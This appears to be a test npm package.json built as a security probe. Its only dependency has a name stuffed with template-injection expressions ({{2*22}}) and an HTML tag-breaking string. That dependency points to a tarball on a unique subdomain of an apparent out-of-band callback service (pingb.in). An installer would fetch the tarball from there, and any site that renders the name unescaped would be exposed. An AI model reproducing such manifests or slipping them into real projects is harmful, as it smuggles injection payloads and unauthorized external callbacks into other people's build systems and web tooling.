{
  "name": "test2",
  "version": "0.0.1",
  "description": "test1",
  "license": "UNLICENSED",
  "dependencies":{
    "scrambled-identifier-AXZQAQWL-test{2*2}{{2*22}\"><input>1": "https://5c7f0d7e2e36483181849124b715.ns.pingb.in/asdf.tar.gz"
  }
}
